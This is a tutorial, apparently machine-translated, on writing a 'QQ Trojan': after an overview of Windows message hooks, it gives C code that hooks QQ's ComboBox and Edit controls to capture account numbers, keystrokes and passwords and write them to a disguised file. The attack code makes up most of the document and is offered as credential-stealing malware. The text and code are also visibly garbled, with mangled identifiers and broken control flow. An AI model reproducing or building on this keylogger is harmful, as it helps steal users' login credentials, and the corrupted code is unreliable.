Have yourself write QQ Trojan ----- HOOK
Let us first review the Windows message classification.
l WM_XXX (except WM_COMMAND and WM_NOTIFY) Windows Message
Hardware input messages or window management messages of the USER module, any class from CWND, can receive this message.
l WM_COMMAND command message
Anyone generated by the UI object may come from the menu or acceleration key (WPARAM representative the source of the message), where the class is born in ccmdTarget is qualified to receive this message.
l WM_COMMAND or WM_NOTIFY control information notifies a message to its parent window (usually a dialog).
Control splitting standard controls such as Edit, ComboBox, Listbox Using WM_COMMAND
Common controls such as Imagelist, Listctrl, TreeCtrl, etc. WM_NOTIFY
l The command message of the WM_SYSCOMMAND system menu. That is, right-click the menu that pops up at the title bar at the window.
The following figure is the Windows message processing machine map:
By the figure above, you can know the message that the thread message pumps can be obtained by setting a message hook for a certain thread. That is to say, any message hook intercepted the message after the message pump processing. The commonly used message hook types are listed below:
l WH_getMessage Monitoring Using PostMessage () Messages into Message Queuing
l WH_CallWndProc monitor system is sent (SendMessage ()) Target window procedure
l WH_CallWndProcret Monitor Messages after the Target Window Process (SendMessage ())
l Wh_keyboard monitor keyboard message
l WH_MOUSE Monitor mouse message
To hook a message of a window, you can use SPY to find the window, set the type of message to capture the message, and start capturing, you can see the listed many messages. The third item of each message has "S", "R", "P" characters, and they represent the meaning of them:
l "S" This message is sent to the message queue using SendMessage. It is waiting to return. Capture the message to use wh_callwndproc
l "R" This message is sent to the message queue using SendMessage and processes the message that is processed by the processing function of the target window. Capture the message to use wh_callwndprocret
l "p" This message is a message that shipped to the message queue using PostMessage, which does not require return. use
WH_GetMessage captures.
Because the number and password of the QQ to be taken, you need to hook the two types of control window messages, one is ComboBox, and the other is of course Edit.
HHOOK1 = SETWINDOWSHOKEX (Wh_CallWndProcret, CallWndretProc, G_HINSTDLL, DWTHREADID);
The Wh_CallWndProcret intercepts the contents of the combo box taken by WM_GetText, and also seizes the contents of the WM_KILLFOCUS to obtain the edit box (non-password box).
HHOOK2 = SETWINDOWSHOKEX (Wh_getMessage, getmsgproc, g_hinstdll, dwthreadid);
Wh_getMessage intercepts the WM_CHAR message to get the keyboard input.
Below is the code for the two hook messages processing functions:
Hinstance g_hinstdll = null; // instance handle
HWND G_HWNDCOMBOX = NULL; // Handle of window to be monitoredhwnd g_hwndited = null;
TCHAR G_LPSZEDITDUMP [32] = {0}; // Keyboard Enter the contents of the EDIT control
Bool g_fsingleenter = true; // One keyboard input POST twice wm_char
//
#pragma data_seg ("Shared")
HHOOK G_HHOOK1 = NULL; // Hook Handle for Thread-Specific Hook
HHOOK G_HHOOK2 = NULL;
Const char g_classname1 [] = "comboBox";
Const char g_classname2 [] = "edit"; // for class name you want to monitor
#define file_path_name "c: //ravdataq.dat"
#pragma data_seg ()
/
Static Lresult WinApi CallWndretProc (int Ncode, WPARAM WPARAM, LPARAM LPARAM)
{
TCHAR LPSZCLASSNAME [16] = {0}; // Message belongs to window class name
INT NINDEX = 0; // ComboBox sequence number selected
TCHAR LPSZCOMBOBOX [16] = {0}; // ComboxBox selected string content
TCHAR LPSZDUMP [64] = {0}; // Combination box Write a string of files
TCHAR LPSTRING [64] = {0}; // Edit box Write the string of the file
CWPRETSTRUCT * PMSG = (cwpretstruct *) LPARAM;
IF (ncode! = hc_action || wparam! = NULL)
{
Return (CallNexthooKex (G_HHHHOOK1, NCODE, WPARAM, LPARAM);
}
Switch (PMSG-> Message)
{
Case WM_GETTEXT:
GetClassName (PMSG-> HWND, LPSZCLASSNAME, SIZEOF (LPSZCLASSNAME);
/ / Judgment whether it is a group box
IF ((0 == lstrcmp (lpszclassname, g_classname1)) &&
(NULL == g_hwndcombox))
{
G_hwndcomboBox = PMSG-> hwnd;
}
IF (g_hwndcomboBOX == pmsg-> hwnd)
{
/ / Get the current comboBox selection selection
NINDEX = (int) sendMessage (g_hwndcombobox,
CB_Getcurseel, 0, 0);
IF (CB_ERR == NINDEX)
{
// If you don't choose to exit
Return (CallNexthooKex (G_HHHHOOK1, NCODE, WPARAM, LPARAM);
}
LSTRCPY (LPSZCOMBOX, LPCSTR (PMSG-> LPARAM); WSPrintf (lpszdump, "index =% d content =% s",
NINDEX, LPSZCOMBOX);
// Write file
Fzwritefile (LPSZDUMP);
}
Break;
Case WM_KILLFOCUS:
GetClassName (PMSG-> HWND, LPSZCLASSNAME, SIZEOF (LPSZCLASSNAME);
/ / Judgment whether it is the edit box under the specified application
IF ((LSTRCMP (lpszclassname, g_classname2) == 0) &&
(g_hwndedit! = NULL))
{
// Judgment is a password box
IF (: getwindowlong (g_hwndedit, gwl_style) &
ES_PASSWORD)
{
WSPrintf (LPSTRING, "Password =% S", (LPTSTSTSTST) G_LPSZEDITDUMP);
}
Else
{
WSPrintf (LPString, "Content =% S", (LPTSTSTSTSTST) G_LPSZEDITDUMP);
// Write the string of string to files
FZWritefile (LPSTRING);
/ / Clear some global variables
g_hwndedit = NULL;
ZeromeMory (g_lpszeditdump, 32);
}
Break;
}
Return (CallNexthooKex (G_HHHHOOK1, NCODE, WPARAM, LPARAM);
}
/
Static Lresult WinApi GetMsgProc (int Ncode, WPARAM WPARAM, LPARAM LPARAM)
{
TCHAR LPSTR [2] = {0}; // Storage button character
CHAR LPSZCLASSNAME [16] = {0};
TCHAR CR = 0x0d; // Enter
LResult Lresult = CallNexthookex (g_hhook2, ncode, wparam, lparam);
PMSG PMSG = (PMSG) LPARAM;
IF (ncode == hc_action)
{
Switch (PMSG-> Message)
{
Case wm_char: // Intercept the keyboard message of the forward focus window
GetClassName (PMSG-> HWND, LPSZCLASSNAME, SIZEOF (LPSZCLASSNAME);
/ / Judgment whether it is the edit box under the specified application
IF ((LSTRCMP (lpszclassname, g_classname2) == 0) &&
(g_hwndedit == null))
{
g_hwndedit = pmsg-> hwnd;
}
IF (g_hwndedit == pmsg-> hwnd)
{
IF (g_fsingleenter)
{
LPSTR [0] = (tchar) (PMSG-> WPARAM);
LPSTR [1] = '/ 0';
LSTRCAT ((LPTSTR) g_lpszeditdump, (lptstr) LPSTR);
g_fsingleenter = false;
}
Else
{
g_fsingleenter = true;
}
}
Break;
}
}
Return (LRESULT);
}
For DLL debugging, please see another article "DLL debugging" published by himself.
